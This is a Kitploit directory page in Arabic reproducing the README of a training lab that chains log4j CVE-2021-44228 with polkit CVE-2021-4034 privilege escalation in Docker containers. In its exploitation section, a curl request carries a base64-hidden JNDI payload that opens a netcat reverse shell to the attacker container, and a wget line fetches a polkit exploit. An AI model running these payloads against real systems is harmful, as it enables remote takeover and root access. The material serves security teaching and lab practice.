Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
log4j-polkit-poc — إعداد ضعيف لعرض سلسلة هجوم لثغرة log4j CVE-2021-44228 مع تصعيد الامتيازات إلى الجذر باستخدام استغلال polkit CVE-2021-4034 | Kitploit
أدوات/GitHubGitHub/0xalwayslucky/log4j-polkit-poc
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالتعلم والتعليمالفريق الأحمرمختبرات وتدريب عملي
GitHub0xalwayslucky/log4j-polkit-poc

log4j-polkit-poc

إعداد ضعيف لعرض سلسلة هجوم لثغرة log4j CVE-2021-44228 مع تصعيد الامتيازات إلى الجذر باستخدام استغلال polkit CVE-2021-4034

عرض المستودع
12منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

log4j CVE-2021-44228 + polkit CVE-2021-4034

مثيل قابل للاستغلال لثغرة log4j في Apache واستغلال رفع الصلاحيات باستخدام polkit

  • تم استخراج ملف spring-boot-application.jar القابل للاستغلال من صورة docker هذه
  • تم تنزيل خادم JNDI الخبيث من هنا وتمت الإشارة إليه في هذه المقالة.

فيديو الإثبات (PoC)

PoC Video

إنشاء المثيلات القابلة للاستغلال

log4j-polkit-vuln

سيكون المثيل القابل للاستغلال قيد التشغيل ويستمع للاتصالات على المنفذ 80 (مكشوفًا على الجهاز المضيف) عند اكتمال الخطوات أدناه. الجزء القابل للاستغلال في ثغرة log4j هو ترويسة X-Api-Version التي يتم إرسالها إلى الخادم.

Docker: log4j-polkit-vulnerable-server

خطوات سحب وتشغيل صورة docker القابلة للاستغلال:

root@kitploit:~
docker pull 0xalwayslucky/log4j-polkit-vulnerable-server
docker run -p 80:8080 0xalwayslucky/log4j-polkit-vulnerable-server

خطوات إنشاء مثيل قابل للاستغلال لـ log4j + polkit يدويًا:

ملاحظة: تتطلب ملفات Dockerfile إصدارات معينة من التطبيقات القابلة للاستغلال أن تكون موجودة داخل مستودعات ubuntu. إذا تم تحديث هذه الإصدارات و/أو إزالتها في أي وقت، فسيفشل بناء صورة docker. لحل هذه المشكلة، سيتم رفع صورة إلى docker hub وربطها هنا.

root@kitploit:~
git clone https://github.com/0xalwayslucky/log4j-polkit-poc
cd log4j-polkit-poc/log4j-polkit-vuln
docker build -t log4j-polkit-vulnerable-server .
docker run -p 80:8080 --hostname victim log4j-polkit-vulnerable-server

attackserver

سيحاكي هذا جهاز المهاجم، وفي هذه الحالة يكون موجودًا داخل نفس الشبكة (بسبب سهولة التواصل بين حاويات docker)، لكن الاستغلال يعمل بغض النظر عن مكان وجود خادم الهجوم هذا (الشرط الوحيد هو أن يكون الضحية قادرًا على الوصول إليه). سيتم استضافة خادم JNDI الخبيث هنا وإنشاء فئة خبيثة لتنفيذ أوامر عشوائية على جهاز الضحية.

خطوات إنشاء جهاز مهاجم محاكى:

root@kitploit:~
git clone https://github.com/0xalwayslucky/log4j-polkit-poc
cd log4j-polkit-poc/attackserver
docker build -t attackserver .
docker run -it --hostname attackserver attackserver /bin/bash
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i <ip> -p 8888 &  # in the docker container

الاستغلال

أوامر من فيديو الإثبات

ملاحظة: قد يختلف عنوان IP الخاص بخادم الهجوم

root@kitploit:~
# Log4j exploit
curl http://localhost -H 'X-Api-Version: ${jndi:ldap://172.17.0.3:1389/Basic/Command/Base64/bmMgMTcyLjE3LjAuMyA0NDQ0IC1lIC9iaW4vYmFzaA==}'

# Polkit exploit
wget https://raw.githubusercontent.com/afwu/CVE-2021-4035/main/cve-2021-4034-poc.c

تنزيل الأداة